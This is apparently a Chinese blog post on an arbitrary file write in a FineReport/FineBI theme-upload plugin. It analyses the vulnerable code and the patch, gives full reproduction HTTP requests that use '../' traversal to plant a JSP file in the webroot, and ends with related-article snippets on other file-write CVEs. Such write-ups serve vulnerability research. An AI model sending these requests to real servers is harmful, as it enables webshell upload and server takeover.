任意文件写入漏洞

于 2024-12-23 05:30:00 发布
阅读量1.1k 收藏 13
点赞数 33
CC 4.0 BY-SA版权
文章标签: 任意文件写入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Libao657/article/details/144419634

0x01简介
国护爆出来的洞,bi需要手动安装,report自带。利用版本有限,比较垃圾

https://help.fanruan.com/finereport/doc-view-4833.html

很清楚看到,一开始的这个漏洞不需要授权,然后后面有进行目录穿越。也就是24.8月前的版本存在问题。

0x02 分析
com.fr.plugin.wysiwyg.web.controller.DuchampThemeRequestService 在这里插入图片描述
可以看到调用upload方法,上传了 在这里插入图片描述
首先从请求中获取id,attachID然后判断是否为空。

不为空就去 FVSTemplateStyleConfig去获取我们传入的id,找不到就会报错。

com.fr.plugin.wysiwyg.web.theme.FVSTemplateStyleConfig 在这里插入图片描述
在这里插入图片描述
来到FVSTemplateStyleConfig中,发现在类加载的时候出忘preStylesMap中put数据,那也就是id就是这里key咯

static {

preStylesMap.put("0e1183e3-4a26-e27d-9e4b-190909fd67a0", "/com/fr/plugin/wysiwyg/web/assets/template/TEMPLATE\_PRESET\_DARK\_1.json");

preStylesMap.put("0946780e-c0b7-839d-5944-8fb840f53450", "/com/fr/plugin/wysiwyg/web/assets/template/TEMPLATE\_PRESET\_DARK\_2.json");

preStylesMap.put("c5bbc3eb-beaa-3926-ff8a-aeb866815284", "/com/fr/plugin/wysiwyg/web/assets/template/TEMPLATE\_PRESET\_DARK\_3.json");

preStylesMap.put("98f6460e-2334-47a7-1081-72a7bd391e56", "/com/fr/plugin/wysiwyg/web/assets/template/TEMPLATE\_PRESET\_LIGHT\_1.json");

}
在看到DuchampResourceRequestHelper.getFileFromReq

在这里插入图片描述
在这里插入图片描述
主要就是request中读入流,然后前后加入一个byte,不用管,最后返回。在这里插入图片描述
然后就是从上一步中获取了文件流,加入到了templateStyle,将attachID和它进行绑定。

然后从metadata的值,将metadata和attachID绑定,这里看到metadata是一个json。传参数用{“”:“”} 传咯。

更新FVSTemplateStyleConfig的templateStyle,最后访问id,attachID。

从上面可以看出,我们可以控制一个FVSTemplateStyleConfig的类容。最后需要把他倒入到webroot下就可以完成恶意文件上传咯。

com.fr.plugin.wysiwyg.web.controller.DuchampThemeRequestService 在这里插入图片描述
这个理由就符合条件

com.fr.plugin.wysiwyg.web.controller.DuchampThemeRequestHelper 在这里插入图片描述
这里就完成了写入,可以看到通过id获取fvsTemplateStyle,然后获取这个fvsTemplateStyle中attachID对应的byte,然后在resource判断有没有有这个attachid,肯定是没有的,继续从fvsTemplateStyle中获取metadata,然后从metadata中获取name的值,若果为空就用attachID + ".png"拼接,这里从metadata取到了,不为空。然后就是进行写入了。

DuchampIO.EDIT_CACHE.write(bean.getTplPath(), name, image);

这就有意思了,image是一个byte流可控,name我们可控,没过滤,也就是可以通过"…/…/" 穿越写入。这样就完成了对webroot下的jsp写入。

整个流程非常巧妙,反正我觉得现在静态分析是分析不出来的,果然厉害的洞还得人审计。

0x03 复现 在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
POST /webroot/decision/view/duchamp/theme/attach?id=98f6460e-2334-47a7-1081-72a7bd391e56&attachID=3&metadata=%7b%22%6e%61%6d%65%22%3a%22%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%73%6b%2e%6a%73%70%22%7d HTTP/1.1

Host:

Accept: */*

Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cache-Control: max-age=0

Connection: close

Content-Length: 294

Content-Type: multipart/form-data; boundary=c6c05c9386d544159462cae057c4a758

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0

–c6c05c9386d544159462cae057c4a758

Content-Disposition: form-data; name=“file”; filename=“test.txt”

Content-Type: text/plain

<% out.println(11809+76625+“FNjzadubmSaGkeSF”);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

–c6c05c9386d544159462cae057c4a758–

POST /webroot/decision/view/duchamp/theme/resource2template HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36

Accept: */*

Accept-Charset: GBK, utf-8;q=0.7, *;q=0.3

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN, zh;q=0.8

Cache-Control: max-age=0

Connection: close

Content-Length: 67

Content-Type: application/json

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0

{“attachIDs”: [“3”], “id”: “98f6460e-2334-47a7-1081-72a7bd391e56”, “reuseIDs”: [“”], “tplPath”: “”}

GET /webroot/decision/view/duchamp/theme/list HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36

Accept: */*

Accept-Charset: GBK, utf-8;q=0.7, *;q=0.3

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN, zh;q=0.8

Cache-Control: max-age=0

Connection: close

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0

0x04 修复方式
uploadTemplateStyleAttach
在这里插入图片描述
添加一个新函数来判断

可以看到先读入文件流,然后调用进行判断

DuchampResourceRequestHelper.checkFileValid(bufferedInputStream, parseResult.getFileExtension()))
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
可以看到主要就两个方法,一个是从 FILE_HEADER_MAGIC_NUMBER获取,获取到就去判断文件头magicNumber,一样就返回true,不一样就返回false。还有一个没有在FILE_HEADER_MAGIC_NUMBER获取到的值,就去FILE_HEADER_WHITE_LIST里面找,找到就是true,找不到就是false。

在这里插入图片描述
对应的后缀以及魔术头。以及白名单后缀。

从上面逻辑可以看到,没什么用,控制文件写入的后缀是metadata中的name。不是在文件流中的后缀,所以我们直接使用白名单的后缀进行绕过就可以完成这里的修复。

写入点 在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
检查了…/…/,匹配到就报错。在这里插入图片描述
在这里插入图片描述
后面还对后缀进行了判断,匹配到就报错 在这里插入图片描述
我们可以绕过第一步,第二步是绕过不了的,新版还是认证后才能访问,看起来没什么继续研究的必要了

Apache Flink -任意文件写入漏洞复现(CVE-2020-17518)
0xSec
01-11 1721
Apache Flink 是高效和分布式的通用数据处理平台,由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎(简单来说,就是跟spark类似)
漏洞复现】CactiEZ weathermap 插件任意文件写入漏洞
失心少年
09-20 479
集成 Thold,Monitor,Syslog,Weathermap,Realtime,Errorimage,Mobile,Aggregate 以及 Apache,Squid,F5,Nginx,MySQL 等模板。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!CactiEZ Weathermap 插件存在任意文件写入漏洞
漏洞复现】---- ActiveMQ任意文件写入漏洞(CVE-2016-3088)
qq_43168364的博客
09-05 851
一、简介 ActiveMQ的web控制台分为三个应用:admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是存储文件接口;admin和api都需要登录后才能使用,fileserver无需登录。 fileserver是一个RESful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计的目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现: (1) 其使用率并不高 (2) 文件操作容易出
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
m0_74402888的博客
05-02 2408
漏洞出现在 fileserver 应用中,漏洞原理是 fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞写入文件方法写入 webshell写入 cron 或 ssh key 等文件写入 jar 或 jetty.xml 等库和配置文件。
ActiveMQ任意文件写入漏洞(CVE-2016-3088)
qq_69775412的博客
12-06 884
简述:ActiveMQ的fileserver支持写入文件(但是不支持解析jsp),同时也支持移动文件。所以我们只需要先上传到服务器,然后再移动到可以解析的地方即可造成任意文件写入漏洞。我们可以利用这个漏洞来上传webshell或者上传定时任务文件。
Aria2 任意文件写入漏洞
shierbai的博客
05-24 527
因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如 http://binux.github.io/yaaw/demo/。6800是aria2的rpc服务的默认端口,环境启动后,访问`http://your-ip:6800/`,发现服务已启动并且返回404或空白页面。打开yaaw,点击配置setting按钮,填入运行aria2的目标域名:`http://your-ip:6800/jsonrpc`注意此处只是为了真实环境区别,我这里靶机和攻撃机是同一台。
LvyeCms-含有任意文件写入漏洞的源码.zip
12-31
然而,如同许多开源软件一样,LvyeCms也存在安全问题,其中最严重的一种是任意文件写入漏洞。这个漏洞允许攻击者通过特定的输入,将任意文件写入到服务器的指定位置,从而可能对系统安全构成极大威胁。 首先,我们...
漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞
qq_48368964的博客
10-01 1583
泛微OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。泛微0-0fice是一款标准化的协同 OA办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
KiteCMS的漏洞挖掘之旅(任意文件写入任意文件读取和反序列化)1
08-03
在本文中,我们将深入探讨KiteCMS的安全漏洞,特别是关于任意文件写入任意文件读取和反序列化的风险。KiteCMS是一个基于ThinkPHP5.1框架构建的内容管理系统(CMS)。由于其代码中存在的一些设计缺陷,攻击者可能...
vulhub靶场——Aria2任意文件写入漏洞复现
ad12456的博客
05-16 1134
0:前期准备: 靶机(CentOS7,IP:192.168.96.222),攻击机(kali ,IP:192.168.96.226) 安装靶场Vulhub,前面有写过步骤。 先了解aria2:Aria2是一个命令行下运行,多协议,多来源下载工具(HTTP /HTTPS,FTP,BitTorrent,Metalink),内建XML-RPC用户界面。Aria提供RPC服务器,通过--enable-rpc参数启动.Aria2的RPC服务器可以方便的添加,删除下载项目。 通过控制文件下载链接,文件储存路径以
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)
swordheart的博客
01-18 1108
漏洞简介 ActiveMQ web控制台分为三个应用,admin、api和fileserver,其中admin为管理员页面,api为接口,fileserver为存放文件的接口;admin和api需要登录才可以使用,fileserver不需要登录。 fileserver 是一个 RESTful API 接口。我们可以通过GET、PUT、DELETE等HTTP请求来读写其中存储的文件。设计目的是为了弥补消息队列操作无法传输和存储二进制文件的缺陷,但后来发现: 它的使用率不高 文件操作容易出现漏洞 所以
Tomcat 任意写入文件漏洞(CVE-2017-12615)
最新发布
weixin_62512865的博客
11-22 524
刷新页面,使用burp进行抓取数据包,将其发送到repeater中,改请求类型为 PUT 类型,并给上传的文件进行重命名操作(这里命名为 1.jsp,上传的文件为一句话木马无回显执行系统命令)首先进入该漏洞的文件目录下,并使用docker启动靶场环境。访问靶场:192.168.187.135:8080。使用冰蝎去尝试连接,连接成功。查看靶场的端口开放情况。
Tomcat 通过 PUT 方法任意写入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1549
CVE-2017-12615 对应的漏洞任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件 。Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件
CVE-2016-3088(ActiveMQ任意文件写入漏洞
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-20 1967
漏洞出现在 fileserver 应用中,漏洞原理是fileserver 支持写入文件(但不解析 jsp),同时支持移动文件(MOVE 请求)。所以我们只需写入一个文件,然后使用 MOVE 请求将其移动到任意位置,造成任意文件写入漏洞
ActiveMQ任意文件写入漏洞
weixin_47493074的博客
09-23 473
ActiveMQ任意文件写入漏洞
揭露LvyeCms任意文件写入漏洞源码
总结以上知识点,本次内容主要围绕了CMS系统、LvyeCms源码、任意文件写入漏洞漏洞影响和预防、优快云平台角色以及版权法和知识产权进行阐述。在处理含有安全漏洞的源码时,应采取适当的措施以避免潜在的安全风险,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值